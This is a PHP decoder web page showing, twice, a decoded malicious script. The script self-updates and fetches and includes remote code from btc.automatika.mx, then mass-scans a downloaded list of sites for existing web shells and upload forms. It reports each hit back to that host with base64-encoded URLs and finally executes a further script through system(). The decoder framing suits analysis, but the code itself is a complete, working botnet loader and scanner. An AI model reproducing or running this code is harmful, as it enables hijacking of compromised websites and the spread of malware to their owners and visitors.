Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ini_set('max_execution_time',0); ini_set('memory_limit', '512M'); date_default_timez..

Decoded Output download

<?php
ini_set('max_execution_time',0);
ini_set('memory_limit', '512M');
date_default_timezone_set('Europe/Kiev');
function http_get_contents($url) {
//	$codex = @file_get_contents($url);
//	if (empty($codex)) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
//		curl_setopt($ch, CURLOPT_HEADER, true);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
		curl_setopt($ch, CURLOPT_TIMEOUT, 30);
		$urlPage = curl_exec($ch);
		curl_close($ch);
		return($urlPage);
//	}
//	else {
//		return $codex;
//	}
}
file_put_contents(basename(__FILE__),http_get_contents('http://btc.automatika.mx/st/get_up.txt'));
file_put_contents('list.txt',http_get_contents('http://btc.automatika.mx/st/list.txt'));
file_put_contents('roll.txt',http_get_contents('http://btc.automatika.mx/st/roll.txt'));
file_put_contents('angry.txt',http_get_contents('http://btc.automatika.mx/st/angry.txt'));
require_once('roll.txt');
require_once('angry.txt');
file_put_contents('get_up.txt', http_get_contents('http://btc.automatika.mx/get_up.php'));
function callback_function($response, $info, $request) {
	if (strlen($response) < 1000) {
		if (preg_match('~(Vuln\!\! patch it Now\!|xin0x g4me|Hacked by MiSh|name=\"ac\" value=\"upload\">|Uploader-NINJA|<input type=\'submit\' name=\'upload\' value=\'upload\'>|input name=\"_upl\" type=\"submit\"|enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\"|enctype=\"multipart\/form-data\" action=\"upload\.php\"|input type=\'file\' name=\'idx_file\'|input name=v type=submit id=v value=up)~i', $response, $out)) {
			http_get_contents('http://btc.automatika.mx/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.up.php'));goto end;
		}
	}
	end:
	return;
}
$AC = new AngryCurl('callback_function');
//$AC->init_console();
$AC->load_useragent_list('list.txt');
$f = fopen('get_up.txt', 'r');
while(!feof($f)) {
	$url = trim(fgets($f));
	$AC->get($url);
}
$AC->execute(30);
unlink('get_up.txt');
system('php inc.class.up.php');
?>

Did this file decode correctly?

Original Code

<?php
ini_set('max_execution_time',0);
ini_set('memory_limit', '512M');
date_default_timezone_set('Europe/Kiev');
function http_get_contents($url) {
//	$codex = @file_get_contents($url);
//	if (empty($codex)) {
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
//		curl_setopt($ch, CURLOPT_HEADER, true);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
		curl_setopt($ch, CURLOPT_TIMEOUT, 30);
		$urlPage = curl_exec($ch);
		curl_close($ch);
		return($urlPage);
//	}
//	else {
//		return $codex;
//	}
}
file_put_contents(basename(__FILE__),http_get_contents('http://btc.automatika.mx/st/get_up.txt'));
file_put_contents('list.txt',http_get_contents('http://btc.automatika.mx/st/list.txt'));
file_put_contents('roll.txt',http_get_contents('http://btc.automatika.mx/st/roll.txt'));
file_put_contents('angry.txt',http_get_contents('http://btc.automatika.mx/st/angry.txt'));
require_once('roll.txt');
require_once('angry.txt');
file_put_contents('get_up.txt', http_get_contents('http://btc.automatika.mx/get_up.php'));
function callback_function($response, $info, $request) {
	if (strlen($response) < 1000) {
		if (preg_match('~(Vuln\!\! patch it Now\!|xin0x g4me|Hacked by MiSh|name=\"ac\" value=\"upload\">|Uploader-NINJA|<input type=\'submit\' name=\'upload\' value=\'upload\'>|input name=\"_upl\" type=\"submit\"|enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\"|enctype=\"multipart\/form-data\" action=\"upload\.php\"|input type=\'file\' name=\'idx_file\'|input name=v type=submit id=v value=up)~i', $response, $out)) {
			http_get_contents('http://btc.automatika.mx/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.up.php'));goto end;
		}
	}
	end:
	return;
}
$AC = new AngryCurl('callback_function');
//$AC->init_console();
$AC->load_useragent_list('list.txt');
$f = fopen('get_up.txt', 'r');
while(!feof($f)) {
	$url = trim(fgets($f));
	$AC->get($url);
}
$AC->execute(30);
unlink('get_up.txt');
system('php inc.class.up.php');
?>

Function Calls

None

Variables

None

Stats

MD5 91cb687bf71ddcbab4b2978a7a284fa5
Eval Count 0
Decode Time 89 ms